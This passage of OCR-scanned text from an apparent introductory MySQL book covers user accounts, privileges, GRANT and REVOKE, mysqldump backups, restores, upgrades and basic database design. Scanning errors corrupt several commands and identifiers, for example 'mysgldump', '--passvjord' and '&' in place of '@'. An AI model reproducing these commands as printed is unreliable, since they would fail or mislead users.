
♦ The hostname can be a name or an IP address. For example, the host- 
name can be a name, such as thor .mycompany. com, or an IP (Internet 
protocol) address, such as 192.163.2.33. The machine on which the 
MySQL server is installed is localhost. 

♦ The hostname can contain wildcards. You can use a percent sign 
(%) as a wildcard: % matches any hostname. If you add an account for 
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george@%, someone who uses the account named george can connect 
to the MySQL server from any computer. 

♦ The hostname can be blank. Leaving the hostname blank is the same as 
using % for the hostname. 

You can create an account with both a blank account name and a blank host- 
name (or a percent sign — % — for the hostname). Such an account would 
allow anyone to connect to the MySQL server by using any account name 
from any computer. But you probably don’t want such an account. This kind 
of an account is sometimes installed when MySQL is installed, but it’s given 
no privileges, so it can’t do anything. 

When MySQL is installed, it automatically installs an account with all privileges: 
root@localhost. Depending on your operating system, this account might 
be installed without a password. Anyone who’s logged in to the computer on 
which MySQL is installed can access MySQL and do anything to it by using 
the account named root. (Qf course, root is a well-known account name, so 
this account isn’t secure. If you’re the MySQL administrator, add a password 
to this account immediately.) 

Passu/orits 

A password is set up for every account. If no password is provided for the 
account, the password is blank, which means that no password is required. 
MySQL doesn’t have any limit for the length of a password, but sometimes 
other software on your system limits the length to eight characters. If so, 
any characters after eight are dropped. 

For extra security, MySQL encrypts passwords before it stores them. That 
means passwords aren’t stored in the recognizable characters that you 
enter. This security measure ensures that no one can simply look at the 
stored passwords and understand what they are. 

Unfortunately, some bad people out there might try to access your data by 
guessing your password. They use software that tries to connect rapidly in 
succession with different passwords — a practice called a brute force attack. 

In any event, your MySQL server shouldn’t be exposed directly to the 
Internet, so an attacker would need to get access to the MySQL server first in 
order to try a brute force attack. 

Account priOite^es 

MySQL uses account privileges to specify who can do what. Anyone using a 
valid account can connect to the MySQL server, but he or she can do only 
those things that are allowed by the privileges for the account. For example, 
an account might be set up so that users can select data but can’t insert or 
update data. 
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Privileges can be granted for particular databases, tables, or columns. For 
instance, an account can allow the user to select data from all the tables in 
the database but insert data into only one table and update only a single 
column in a specific table. 

Table 2-1 lists some privileges that you might want to assign or remove. 
Other privileges are available, but they’re less commonly used. You can find 
a complete list of privileges in the MySQL online manual at http: / / dev. 
mysql.com/doc/refman/S.6/en/privileges-provided.htinl. 


Table 2-1 

MySQL Account Privileges 

Prii/Heqe 

description 

ALL 

All privileges 

ALTER 

Can alter the structure of tables 

CREATE 

Can create new databases ortables 

DELETE 

Can delete rows in tables 

DROP 

Can drop databases ortables 

FILE 

Can read and write files on the server 

GRANT 

Can change the privileges on a MySQL account 

INSERT 

Can insert new rows into tables 

SELECT 

Can read data from tables 

SHUTDOWN 

Can shut down the MySQL server 

UPDATE 

Can change data in a table 

USAGE 

No privileges 



You probably don’t want to grant all because it includes privileges for 
administrative operations, such as shutting down the MySQL server — 
privileges that you don’t want anyone other than yourself to have. 


Setting Up M^SQL Accounts 

An account is identified by the account name and the name of the com¬ 
puter allowed to access MySQL from this account. When you create a new 
account, you specify it as accountname&hostname. You can specify a pass¬ 
word when you create an account, or you can add a password later. You can 
also set up privileges when you create an account or add privileges later. 
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The MySQL security database 


When MySQL is installed, it automatically cre¬ 
ates a database called mysql. All the infor¬ 
mation used to protect your data is stored in 
this database, including account names, host- 
names, passwords, and privileges. 

Privileges are stored in columns. The format 
of each column name is privilege_priv, 
in which privilege is a specific account 
privilege. For instance, the column containing 
ALTER privileges is named alter_priv. 
The value in each privilege column is Y or N, 
meaning yes or no. So, for instance, in the user 
table (described in the following list), there 
would be a row for an account and a column 
for alter_priv. If the account field for 
alter_priv contains Y, the account can 
be used to execute an alter statement. 
If alter_priv contains N, the account 
doesn't have privilege to execute an alter 
statement. 

The mysql database contains the following 
tables that store privileges: 

user table: This table stores privileges 
that apply to all the databases and tables. 
It contains a row for each valid account 
that includes the columns user name, 
hostname, and password. The MySQL 
server rejects a connection for an account 
that doesn't exist in this table. 

db table: This table stores privileges that 
apply to a particular database. It contains 
a row for the database, which gives privi¬ 
leges to an account name and a hostname. 
The account must exist in the user table 
for the privileges to be granted. Privileges 
that are given in the user table overrule 
privileges in this table. 

For instance, if the user table has a row 
for the account designer that gives 


INSERT privileges, designer can 
insert into all the databases. If a row in 
the db table shows N for insert for the 
designer account in the PetCatalog 
database, the user table overrules 
it, and designer can insert in the 
PetCatalog database. 

host table: This table controls access to 
a database, depending on the host. The 
host table works with the db table. If a 
row in the db table has an empty field for 
the host, MySQL checks the host table to 
see whetherthe db has a rowthere. In this 
way, you can allow access to a db from 
some hosts but not from others. 

For instance, suppose you have two data¬ 
bases: dbl and db2. The dbl database 
has sensitive information, so you want only 
certain people to see it. The db2 database 
has information that you want everyone 
to see. If you have a row in the db table 
for dbl with a blank host field, you can 
have two rows for dbl in the host table. 
Qne row can give all privileges to users 
connecting from a specific host, whereas 
another row can deny privileges to users 
connecting from any other host. 

tables_priv table: This table stores 
privileges that apply to specific tables. 

columns priv table: This table stores 
privileges that apply to specific columns. 

You can see and change the tables in mysql 
directly if you're using an account that has the 
necessary privileges. You can use SQL queries 
such as select, insert, and update. 
If you're accessing MySQL through your 
employer, a client, or a web hosting company, 
you probably don't have an account with the 
necessary privileges. 
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All the account information is stored in a database named mysql that’s auto¬ 
matically created when MySQL is installed. To add a new account or change 
any account information, you must use an account that has the proper privi¬ 
leges on the mysql database. 

In the rest of this section, we describe how to add and delete accounts and 
change passwords and privileges for accounts — and how to refresh privi¬ 
leges so that MySQL sees the changes. 

However, if you have an account that you received from your company IT 
department or from a web hosting company, you might receive an error 
when you try to add an account or change account privileges as described in 
this chapter. If your account is restricted from performing any of the neces¬ 
sary queries, you need to request an account with more privileges or ask the 
MySQL administrator to add a new account for you or make the changes you 
need. 

Identift^inq^ u/fiat accounts cuvventti^ exist 

To see the account information, you can execute an SQL query, using 
the mysql client as described in Chapter 1 of this minibook. To see what 
accounts currently exist for your database, you need an account that has the 
necessary privileges. 

All the account names are stored in a database named mysql in a table 
named user. To see the account information, you can execute the following 
query on a database named mysql: 

SELECT * FROM user 

You should get a list of all the accounts. However, if you’re accessing MySQL 
through your company or a web hosting company, you probably don’t have 
the necessary privileges. In that case, you might get an error message like 
this: 

No Database Selected 

This message means that your account is not allowed to select the mysql 
database. Qr you might get an error message saying that you don’t have the 
SELECT privilege. Even though this message is annoying, it’s a sign that the 
company has good security measures in place. However, it also means that 
you can’t see what privileges your account has. You must ask your MySQL 
administrator or try to figure it out yourself by trying queries and seeing 
whether you’re allowed to execute them. 
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Adding accounts 

The preferred way to access MySQL from PHP is to set up an account spe¬ 
cifically for this purpose with only the privileges that are needed, and we 
describe in this section how to add accounts. 
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If you’re using an account given to you by a company IT department or a 
web hosting company, it might or might not have all the privileges needed to 
create an account. If it doesn’t, you can’t successfully execute the statement 
to add an account, and you have to request a second account to use with PHP. 

If you need to request a second account, get an account with restricted 
privilege (if at all possible) because your web database application is more 
secure if the account your PHP programs use doesn’t have more privileges 
than are necessary. 


To create one or more users when you have the necessary privileges, you 
can use the create user statement (added to MySQL in version 5.0.2), as 
follows: 


CREATE USER accountname@hostname IDENTIFIED BY 'password', 
accountname@hostname IDENTIFIED BY 'password',... 

This statement creates the specified new user account(s) with the specified 
password for each account and no privileges. You don’t need to specify 
a password. If you leave out IDENTIFIED by ' password ', the account 
is created with no password. You can add or change a password for the 
account at a later time. We discuss adding passwords and privileges in the 
sections “Adding and changing passwords” and “Changing privileges,” later 
in this chapter. 

If you’re using a version of MySQL before 5.0.2, you must use a grant 
statement to create an account. We describe the grant statement in the 
“Changing privileges” section, later in this chapter. 


Adding and changing passu/ords 

Passwords aren’t set in stone. You can add or change a password for an 
existing account. Like any of the procedures in this section, you can add or 
change passwords with an SQL statement, like this: 

SET PASSWORD FOR username@hostname = PASSWORD('password') 

The account is set to password for the account usernaine@hostnaine. If the 
account currently has a password, the password is changed. You don’t need 
to specify the for clause. If you don’t, the password is set for the account 
you’re currently using. 
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You can remove a password by sending the SET PASSWORD statement with 
an empty password: 


SET PASSWORD FOR username&hostname = PASSWORD('') 



When you make changes to passwords, you need to refresh the privileges 
so that MySQL sees the change. This is accomplished with the flush 
PRIVILEGES Statement: 

FLUSH PRIVILEGES 


Chan^in^ priUite^es 

Each account has a set of privileges that specifies what the user of the 
account can and can’t do. You can set the privileges when you create an 
account, but you can also change the privileges of an account at any time. 
The most useful privileges that you can set for an account are shown earlier 
in the chapter, in Table 2-1. 

You can see the current privileges for an account by sending the following 
statement: 

SHOW GRANTS ON accountname&hostname 


The output is a grant statement that would create the current account. The 
output shows all the current privileges. If you don’t include the ON clause, you 
see the current privileges for the account that issued the SHOW grants query. 


You can change privileges for an account with the grant statement, which 
has the following general format: 



GRANT privilege {columns) ON tablename 

TO accountname&hostname IDENTIFIED BY 'password' 

Like other privilege-related changes, you need to refresh the privileges after 
making changes using flush privileges. 

You can also create a new account or change a password with the grant 
statement. You need to fill in the following information: 


♦ privilege ( columns): You must list at least one privilege. You can 
limit each privilege to one or more columns by listing the column name 
in parentheses following the privilege. If you don’t list a column name, 
the privilege is granted on all columns in the table(s). You can list as 
many privileges and columns as needed, separated by commas. You 
can see the possible privileges listed in Table 2-1. For instance, a grant 
statement might start with this: 

grant select (firstName,lastName), update, 
insert (birthdate) . . . 
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♦ tablename: The name (or names) of the table(s) on which the privilege 
is granted. You need to include at least one table. You can list several 
tables, separated by commas. The possible values for tablename are 

• tablename: The entire table named tablename in the current data¬ 
base. You can use an asterisk (*) to mean all tables in the current 
database. If you use an asterisk and no current database is selected, 
the privilege is granted to all tables on all databases. 

• databasename. tablename: The entire table named tablename in 
databasename. You can use an asterisk (*) for either the database 
name or the table name to mean all databases or tables. Using * . * 
grants the privilege on all tables in all databases. 

♦ accountname&hostname: If the account already exists, it’s given the 
indicated privileges. If the account doesn’t exist, it’s added. The account 
is identified by the accountname and the hostname as a pair. If an 
account exists with the specified account name but a different host- 
name, the existing account isn’t changed; a new one is created. 

♦ password: The password that you’re adding or changing. A password 
isn’t required. If you don’t want to add or change a password for this 
account, leave out the phrase identified by ' password '. 

For example, the grant statement that adds a new account for use in the PHP 
scripts for an online catalog database named ProductCatalog might be 

GRANT select ON ProductCatalog.* TO phpuser@localhost 
IDENTIFIED BY 'A41!14a!' 

To remove privileges, use the revoke statement. The general format is 

REVOKE privilege (columns) ON tablename 
FROM accountname@hostname 

You need to fill in the appropriate information. 

You can remove all the privileges for an account with the following revoke 
statement: 

REVOKE all ON *.* FROM accountname&hostname 

RemoUin^ accounts 

You might want to remove an account. In most cases, having an account 
that no one uses doesn’t have any negative effects. However, if you think an 
account has been compromised, you might want to remove it for security 
reasons. 
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To remove an account, you can use the drop user statement (which was 
added in MySQL 4.1.1), as follows: 

DROP USER accountname&hostname, accountname&hostname, ... 

You must use an account that has delete privileges on the mysql database 
to execute the drop user statement. 



The behavior of drop user has changed through MySQL versions. As of 
MySQL 5.0.2, it removes the account and all records related to the account, 
including records that give the account privileges on specific databases or 
tables. However, in versions before MySQL 5.0.2, drop user drops only 
accounts that have no privileges. Therefore, in older versions, you must 
remove all the privileges from an account, including database or table privi¬ 
leges, before you can drop that account. 


Backing Up l/our database 



You need to have at least one backup copy of your valuable database. 
Disasters occur rarely, but they do occur. The computer where your data¬ 
base is stored can break down and lose your data, the computer file can 
become corrupted, the building can burn down, and so on. Backup copies of 
your database guard against data loss from such disasters. 

You should have at least one backup copy of your database stored in a loca¬ 
tion that’s separate from the copy you currently use. You should probably 
have more than one copy — perhaps as many as three. 

Here’s how you can store your copies: 


♦ First copy: Store one copy in a handy location, perhaps even on the 
same computer on which you store your database, to quickly replace a 
working database that becomes damaged. 

♦ Second copy: Store a second copy on another computer in case the 
computer on which you have your database breaks down, making the 
first backup copy unavailable. 

♦ Third copy: Store a third copy in a different physical location to prepare 
for the remote chance that the building burns down. If you store the 
second backup copy on a computer at another physical location, you 
don’t need this third copy. 



If you don’t have access to a computer offsite on which you can back up 
your database, you can copy your backup to a portable medium, such as a 
CD or DVD, and store it offsite. Certain companies will store your computer 
media at their location for a fee, or you can just put the media in your pocket 
and take it home. 
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If you use MySQL on someone else’s computer, such as the computer of a 
web hosting company, the people who provide your access are responsible 
for backups. They should have automated procedures in place that make 
backups of your database. When evaluating a web hosting company, ask 
about the backup procedures. You want to know bow often backup copies 
are made and where they’re stored. If you’re not confident that your data is 
safe, you can discuss changes or additions to the backup procedures. 

If you’re the MySQL administrator, you’re responsible for making backups. 
Even if you’re using MySQL on someone else’s computer, you might want to 
make your own backup copy, just to be safe. 

Make backups at certain times — at least once per day. If your database 
changes frequently, you might want to back up more often. For example, 
you might want to back up to the backup directory hourly but back up to 
another computer once a day. 
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You can back up your MySQL database by using a utility program called 
mysqldump, provided by MySQL. The mysqldump program creates a text 
file that contains all the SQL statements you need to re-create your entire 
database. Tbe file contains the create statements for each table and 
INSERT statements for each row of data in the tables. You can restore your 
database, either to its current location or on another computer, by executing 
this set of MySQL statements. 


Backing up on Windows 

To make a backup copy of your database in Windows, follow these steps: 

h Open a command prompt window. 

For instance, choose StartOAll ProgramsOAccessoriesOCommand Prompt. 

2. Change to the bin subdirectory in the directory where MySQL is 
installed. 

For instance, type cd c:\Program Files\MySQL\MySQL Server 5.0\bin 
into the command prompt. 

3. Type the following: 

mysqldump --user=accountnaine --passvjord.=password 
databasename >path\backupfi1ename 

Backing up on Linux, Unix, and Mac 

Follow these steps to make a backup copy of your database in Linux, in Unix, 
or on a Mac: 

1. Change to the bin subdirectory in the directory in which MySQL is 
installed. 

For instance, type cd /usr/local/mysql/bin. 
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2. Type the following: 

mysqldump --usex=accountnaine --password=passw'ord 
databasenaiae >path/backupfilename 

In the preceding code, make the following substitutions: 

• accountname: Replace with the name of the MySQL account that 
you’re using to back up the database. 

• password Use the password for the account. 

• da tabasename: Use the name of the database that you want to back 
up. 

• path/backupfilename: Replace path with the directory in which 
you want to store the backups and backup filename with the name 
of the file in which you want to store the SQL output. 

The account that you use needs to have select privilege. If the account 
doesn’t require a password, you can leave out the entire password 
option. 

You can type the command on one line without pressing Enter. Qr you 
can type a backslash (\), press Enter, and continue the command on 
another line. 


For example, to back up the PetCatalog database, you might use the 
command 


mysgldump --user=root --password=secret PetCatalog \ 
>/usr/local/mysql/backups/PetCatalogBackup 



Note: With Linux or Unix, the account that you’re logged in to must have 
privilege to write a file into the backup directory. 

You must type the mysqldump command on one line without pressing 
Enter. 

In the preceding code, make the following substitutions: 


• accountname: Enter the name of the MySQL account that you’re 
using to back up the database. 

The account that you use needs to have select privilege. If the 
account doesn’t require a password, you can leave out the entire 
password option. 

• password Use the password for the account. 

• da tabasename: Replace with the name of the database that you 
want to back up. 

• path\backupfilename: Replace path with the directory in which 
you want to store the backups and use the name of the file in which you 
want to store the SQL output in place of backup filename. 
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For example, to back up the ProductCatalog database, you might use the 
command 

mysgldump --user=root ProductCatalog >ProdCatalogBackup 


Restoring l/our Data 

At some point, one of your database tables might become damaged and 
unusable. It’s unusual, but it happens. For instance, a hardware problem or 
an unexpected computer shutdown can cause corrupted tables. Sometimes, 
an anomaly in the data that confuses MySQL can cause corrupt tables. In 
some cases, a corrupt table can cause your MySQL server to shut down. 

Here’s a typical error message that signals a corrupted table: 

Incorrect key file for table: ' tablename'. 

You can replace the corrupted table(s) with the data stored in a backup copy. 

However, in some cases, the database might be lost completely. For instance, 
if the computer on which your database resides breaks down and can’t be 
fixed, your current database is lost — but your data isn’t gone forever. You 
can replace the broken computer with a new computer and restore your 
database from a backup copy. 

You can replace your current database table(s) with the database you’ve 
stored in a backup copy. The backup copy contains a snapshot of the data 
as it was when the copy was made. Of course, you don’t get any of the changes 
to the database since the backup copy was made; you have to re-create 
those changes manually. 

Again, if you access MySQL through an IT department or through a web 
hosting company, you need to ask the MySQL administrator to restore your 
database from a backup. If you’re the MySQL administrator, you can restore 
it yourself. 

As we describe in Chapter 1 of this minibook, you build a database by creating 
the database and then adding tables to the database. The backup created by 
the mysqldump utility, as described in the section “Backing Up Your Database,” 
earlier in this chapter, is a file that contains all the SQL statements necessary 
to rebuild the tables, but it doesn’t contain the statements you need to 
create the database itself. 

To restore the database from the backup file, you must first edit the backup 
file (which is a text file). Then, you use the mysql client to create the data¬ 
base from the SQL statements in the backup file. 
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First, you edit the backup file by following these steps: 

1. Open the backup file in a text editor. 

2. Locate the line that shows the Server Versions. 

3. If you want to rebuild an entire database, add the following statement 
below the line that you locate in Step 2: 

CREATE DATABASE IF NOT EXISTS databasename 

It. Below the line in Step 3, add a line specifying which database to add 
the tables to: 

USE databasename 

5. Check the blocks of statements that rebuild the tables. 

If you don’t want to rebuild a table, add - - (two hyphens) at the begin¬ 
ning of each line that rebuilds the table. The hyphens mark the lines as 
comments. 

6. Check the insert lines for each table. 

If you don’t want to add data to any tables, comment out the lines that 
INSERT the data. 

7. Save the edited backup file. 


After the backup file contains the statements that you want to use to rebuild 
your database or table(s), you can use the mysql client to execute the SQL 
statements in the backup file. Just follow these steps: 



1. From a command line prompt, change to the bin subdirectory in the 
directory where MySQL is installed. 

In Windows, you open a command prompt window to use the mysql 
client, as described in Chapter 1 of this minibook. 

Type a cd command to change to the correct directory. For instance, 
you might type cd /usr/local/mysql/bin or cd c:\Program FilesX 
MySQLNMySQL Server 5.0\bin. 

2. Type this command (which sends the SQL queries in the backup file): 

mysql -u accountname -p < path/backupfilename 

You replace accountname with an account that has create privilege. If 
the account doesn’t require a password, leave out the -p. If you use the 
-p, you’re asked for the password. Use the entire path and filename for 
the backup file. For instance, you could use this command to restore the 
ProductCatalog database: 

mysql -u root -p < c:\Program Files\MySQL\MySQL Server 
5.0\bin\bak\ProductCatalog.bak 
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The tables might take a short time to restore. Wait for the command to 
finish. If a problem occurs, an error message appears. If no problems occur, 
you see no output. When the command is finished, the prompt appears. 

Your database is now restored with all the data that was in it at the time the 
copy was made. If the data has changed since the copy was made, you lose 
those changes. For instance, if more data was added after the backup copy 
was made, the new data isn’t restored. If you know the changes that were 
made after creating the backup, you can make them manually in the restored 
database. 


Up^radin^ MySQL 

New versions of MySQL are released periodically, and you can upgrade from 
one version of MySQL to a newer version. You can find upgrading informa¬ 
tion in the MySQL manual at http: / /dev.mysql. com/doc/ref man/5.5/ 
en/upgrading.html. 


However, there are special considerations when you upgrade. As a precaution, 
back up your current databases, including the grant tables in the mysql 
database, before upgrading. 



MySQL recommends that you don’t skip versions. If you want to upgrade 
from one version to a version more than one version newer, such as from 
MySQL 4.0 to MySQL 5.0, you should upgrade to the next version first. After 
that version is working correctly, you can upgrade to the next version, and 
so on. In other words, upgrade from 4.0 to 4.1, then from 4.1 to 5.0. 


Occasionally, incompatible changes are introduced in new versions of MySQL. 
Some releases introduce changes to the structure of the grant tables. For 
Instance, MySQL 4.1 changed the method of encrypting passwords, requiring 
a longer password field in the grant tables. 


After upgrading to the newer version, you should run the mysql_upgrade 
script. It repairs your files and upgrades the system tables, if needed. In ver¬ 
sions prior to MySQL version 5.0.19, the mysql_upgrade script doesn’t run 
on Windows; it runs only on Unix. Qn Windows, you can run a script called 
mysql_f ix_privileges_tables with MySQL versions prior to 5.0.19. The 
script upgrades the system tables but doesn’t perform the complete table 
check and repair that mysql_upgrade performs. 
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Chapter 3: Oesi^nin^ and Building 
a database 


In This Chapter 

Planning your database 
Designing a sample database 
Constructing your database 
Restructuring your database 


# he first step in creating a database is to design it. You design a database 
m before you ever put finger to keyboard to create that database. Planning 
is perhaps the most important step. It’s very painful to discover after you 
build the database and put it in service that it doesn’t contain all the data or 
provide the relationships between data that you need, so in this chapter we 
give you some tips for designing a database that will work well for you. 

After completing your database design, you’re ready to build that database, 
and we tell you how to do that too, later in the chapter. You create the data¬ 
base and its tables according to the design you developed. When it’s built, 
you have a useful, empty database, waiting for you to fill it with data. You 
can then read about adding and retrieving data in Chapter 4 of this minibook. 


Desi0nin0 a database 

Designing the database includes identifying the data that you need and orga¬ 
nizing the data in the way that the database software requires. As you plan 
your database design, you’ll also need to decide on a primary key for each 
table and how tables relate to one another. You should also consider what 
types of data you will store in your database. 

Choosing the data 

To design a database, you first must identify what information belongs in it. 
The database must contain the data needed for the website to perform its 
purpose. 
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Here are a few examples: 

♦ An online catalog needs a database containing product information. 

♦ An online order application needs a database that can hold customer 
Information and order information. 

♦ A travel website needs a database with information on destinations, res¬ 
ervations, fares, schedules, and so on. 

In many cases, your application might include a task that collects informa¬ 
tion from the user. For instance, customers who buy products from a web¬ 
site must provide their address, phone number, credit card information, and 
other data in order to complete the order. The information must be saved at 
least until the order is filled. Often, the website retains the customer infor¬ 
mation to facilitate future orders so the customer doesn’t need to retype the 
information when placing the next order. The information also provides mar¬ 
keting opportunities to the business operating the website, such as sending 
marketing offers or newsletters to customers. 

A customer database might collect the following customer information: 

♦ Name 

♦ Address 

♦ Phone number 

♦ Fax number 

♦ E-mail address 



You have to balance your urge to collect all the potentially useful informa¬ 
tion you can think of against your users’ reluctance to give out personal 
information — as well as their avoidance of forms that look too time- 
consuming. 


One compromise is to ask for some optional information. Users who don’t 
mind can enter that information, but users who object can leave that portion 
of the form blank. You can also offer an incentive: The longer the form, the 
stronger the incentive you need to motivate the user to fill out the form. 
Here’s an example: A user might be willing to fill out a short form to enter a 
sweepstakes that offers two sneak-preview movie tickets as a prize, but if the 
form is long and complicated, the prize needs to be more valuable, such as a 
chance to win a trip to Hollywood. 



Take the time to develop a comprehensive list of the information you need 
to store in your database. Although you can change and add information to 
your database after you develop it, including the information from the begin¬ 
ning is easier, and you might be able to avoid the extra work of changing the 
database later. Also, if you add information to the database later — after that 
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database is in use — the first users in the database have incomplete informa¬ 
tion. For example, if you change your form so that it now asks for the user’s 
age, you don’t have the age for the people who already filled out the form 
and are already in the database. 

Or^anizin^ the data 

MySQL is a Relational Database Management System (RDBMS), which means 
the data is organized into tables. (See Chapter 1 in this minibook for more on 
how MySQL works.) 

RDBMS tables are organized like other tables that you’re used to — in rows 
and columns, as shown in the following table. 

Column 1 Column 2 Column 3 Column 4 


Row 1 
Row 2 
Row 3 
Row 4 


The individual cell in which a particular row and column intersect is called 
a field. 

The focus of each table is an object (a thing) that you want to store informa¬ 
tion about. Here are some examples of objects: 


♦ 

Customers 

■¥ Books 

♦ 

Products 

> Computers 

♦ 

Companies 

Shapes 

♦ 

Animals 

■¥ Documents 

♦ 

Cities 

> Projects 

♦ 

Rooms 

■¥ Weeks 


You create a table for each object. The table name should clearly identify 
the objects that it contains with a descriptive word or term, based on the 
following guidelines: 

♦ The name must be a character string, containing letters, numbers, 
underscores, or dollar signs, but no spaces. 

♦ It’s customary to name the table in the singular form. Thus, a name for a 
table of customers might be Customer, and a table containing customer 
orders might be named CustomerOrder. 
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♦ The difference between uppercase and lowercase is significant on Linux 
and Unix, but not on Windows. CustomerOrder and Customerorder 
are the same to Windows — but not to Linux or Unix. That said, it’s best 
to be sensitive to case in the event that you ever need to change hosting 
platforms. 

In database talk, an object is an entity, and an entity has attributes. In the 
table, each row represents an entity, and the columns contain the attributes 
of each entity. For example, in a table of customers, each row contains infor¬ 
mation for a single customer. Some of the attributes contained in the col¬ 
umns might include first name, last name, phone number, and age. 

Follow these steps to decide how to organize your data into tables: 

1 . Name your database. 

Assign a name to the database for your application. For instance, you 
might name a database containing information about households in a 
neighborhood HouseholdDirectory. 

2. Identify the objects. 

Look at the list of information that you want to store in the database (as 
discussed in the preceding section). Analyze your list and identify the 
objects. For instance, the HouseholdDirectory database might need 
to store the following: 

• Name of each family member 

• Address of the house 

• Phone number 

• Age of each household member 

• Favorite breakfast cereal of each household member 

When you analyze this list carefully, you realize that you’re storing infor¬ 
mation about two objects: the household and the household members. 
The address and phone number are for the household, in general, but the 
name, age, and favorite cereal are for each particular household member. 

3 . Define and name a table for each object. 

For instance, the HouseholdDirectory database needs a table called 
Household and a table called HouseholdMember. 

4. Identify the attribntes for each object. 

Analyze your information list and identify the attributes you need to 
store for each object. Break the information to be stored into its small¬ 
est reasonable pieces. For example, when storing the name of a person 
in a table, you can break the name into first name and last name. Doing 
this enables you to sort by the last name, which would be more difficult 
if you stored the first and last name together. You can even break down 
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the name into first name, middle name, and last name, although not 
many applications need to use the middle name separately. 

5. Define and name columns for each separate attribute that you identify 
in Step 4. 

Give each column a name that clearly identifies the Information in that 
column. The column names should be one word, with no spaces. For 
example, you might have columns named f irstName and lastName or 
first_name and last_name. 

MySQL and SQL reserve some words for their own use, and you can’t 
use those words as column names. The words are currently used in 
SQL statements or are reserved for future use. You can’t use add, all, 
AND, CREATE, DROP, GROUP, ORDER, RETURN, SELECT, SET, TABLE, USE, 
WHERE, and many, many more as column names. For a complete list of 
reserved words, see the online MySQL manual at http: //dev.mysql. 
com/doc/refman/S.5/en/reserved-words.html. 

6. Identify the primary key. 

Each row in a table needs a unique identifier. No two rows in a table 
should be exactly the same. When you design your table, you decide 
which column holds the unique identifier, called the primary key. 

The primary key can be more than one column combined. In many 
cases, your object attributes don’t have a unique identifier. For example, 
a customer table might not have a unique identifier because two custom¬ 
ers can have the same name. When you don’t have a unique identifier 
column, you need to add a column specifically to be the primary key. 
Frequently, a column with a sequence number is used for this purpose. 
For example, in Table 3-1, the primary key is the cust_id field because 
each customer has a unique ID number. 


Table 3-1 

A Sample of Data from the Customer Table 

custjd 

firstjname 

tast mme 

phone 

27895 

John 

Smith 

555-5555 

44555 

Joe 

Lopez 

555-5553 

23695 

Judy 

Chang 

555-5552 

29991 

Jubal 

Tudor 

555-5556 

12345 

Joan 

Smythe 

555-5559 


7. Define the defaults. 

You can define a default that MySQL assigns to a field when no data is 
entered into the field. You don’t need a default, but one can often be 
useful. For example, if your application stores an address that includes 
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a country, you can specify u. S. as the default. If the user doesn’t type a 
country, MySQL enters u. S. 

8. Identify columns that require data. 

You can specify that certain columns aren’t allowed to be empty (also 
called null). For instance, the column containing your primary key 
can’t be empty. If no value is stored in the primary key column, MySQL 
doesn’t create the row and returns an error message. The value can be 
a blank space or an empty string (for example, ""), but some value must 
be stored in the column. You can set other columns, in addition to the 
primary key, to require data. 



Well-designed databases store each piece of information in only one place. 
Storing it in more than one place is inefficient and creates problems if you 
need to change information. If you change information in one place but forget 
to change it in another place, your database can have serious problems. 



If you find that you’re storing the same data in several rows, you probably 
need to reorganize your tables. For example, suppose you’re storing data 
about books, including the publisher’s address. When you enter the data, you 
realize that you’re entering the same publisher’s address in many rows. A 
more efficient way to store this data would be to store the book information in 
one table and the book publisher information in another table. You can define 
two tables: Book and BookPublisher. In the Book table, you would have 
the columns title, author, pub_date, and price. In the BookPublisher 
table, you would have columns such as name, streetAddress, and city. 


Creating retationships between tables 

Some tables in a database are related. Most often, a row in one table is related 
to several rows in another table. You need a column to connect the related 
rows in different tables. In many cases, you include a column in one table to 
hold data that matches data in the primary key column of another table. 

A common application that needs a database with two related tables is a 
customer order application. For example, one table contains the customer 
information, such as name, address, and phone number. Each customer can 
have from zero to many orders. You could store the order information in the 
table with the customer information, but a new row would be created each 
time the customer placed an order, and each new row would contain all the 
customer’s information. You can much more efficiently store the orders 
in a separate table, named perhaps CustomerOrder. (You can’t name the 
table just Order because that’s a reserved word.) In the CustomerOrder 
table, you include a column that contains the primary key from a row in the 
Customer table so the order is related to the correct row of the Customer 
table. The relationship is shown in Table 3-1 (earlier in the chapter) and 
Table 3-2. 
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The Customer table in this example looks like Table 3-1. Each customer has 
a unique cust_id. The related CustomerOrder table is shown in Table 3-2. It 
has the same cust_id column that appears in the Customer table. Through 
this column, the order Information in the CustomerOrder table is connected 
to the related customer’s name and phone number in the Customer table. 


Table 3-2 

Sample Data from the CustomerOrder Table 

order no 

custjd 

item name 

cost 

87-222 

27895 

T-Shirt 

20.00 

87-223 

27895 

Shoes 

40.00 

87-224 

12345 

Jeans 

35.50 

87-225 

34521 

Jeans 

35.50 

87-226 

27895 

Hat 

15.00 


In this example, the columns that relate the Customer table and the 
CustomerOrder table have the same name. They could have different 
names, as long as the columns contain the same data. 

Storing different ti^pes of data 

MySQL stores information in different formats, based on the type of informa¬ 
tion that you tell MySQL to expect. MySQL allows different types of data to 
be used in different ways. The main types of data are character, numerical, 
and date and time data. We describe those and other data types and then 
tell you how to indicate which data type you’re using in each column. 

Character data 

The most common type of data is character data (data that’s stored as strings 
of characters), and it can be manipulated only in strings. Most of the informa¬ 
tion that you store is character data — for example, customer name, address, 
phone number, and pet description. You can move and print character data. 
Two character strings can be put together (concatenated), a substring can be 
selected from a longer string, and one string can be substituted for another. 

Character data can be stored in a fixed-length or variable-length format: 

♦ Fixed-length format: In this format, MySQL reserves a fixed space for 
the data. If the data is longer than the fixed length, only the characters 
that fit are stored — the remaining characters on the end aren’t stored. 

If the string is shorter than the fixed length, the extra spaces are left 
empty and wasted. 

♦ Variable-length format: In this format, MySQL stores the string in a field 
that’s the same length as the string. You specify a string length, but if 
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the string itself is shorter than the specified length, MySQL uses only the 
space required, instead of leaving the extra space empty. If the string is 
longer than the space specified, the extra characters aren’t stored. 

If a character string length varies only a little, use the fixed-length format. 

For example, a length of ten works for all ZIP codes, including those with the 
ZIP+4 number. If the ZIP code doesn’t include the ZIP+4 number, only five 
spaces are left empty. However, if your character string can vary more than 
a few characters, use a variable-length format to save space. For example, 
your pet description might be small bat, or it might run to several lines of 
description. By storing this description in a variable-length format, you only 
use the necessary space. 

Numericat data 

Another common type of data is numerical data — data that’s stored as 
a number. You can store decimal numbers (for example, 10.5, 2.34567, 
23456.7) as well as integers (for example, 1, 2, 248). When you store data as a 
number, you can use that data in numerical operations, such as adding, sub¬ 
tracting, and squaring. If you don’t plan to use data for numerical operations, 
however, you should store it as a character string because the programmer 
will be using it as a character string. No conversion is required. 

MySQL stores positive and negative numbers, but you can tell MySQL to 
store only positive numbers. If your data is never negative, store the data as 
unsigned (without a + or - sign before the number). For example, a city popu¬ 
lation or the number of pages in a document can never be negative. 

MySQL provides a specific type of numeric column called an auto-increment 
column. This type of column is automatically filled with a sequential number 
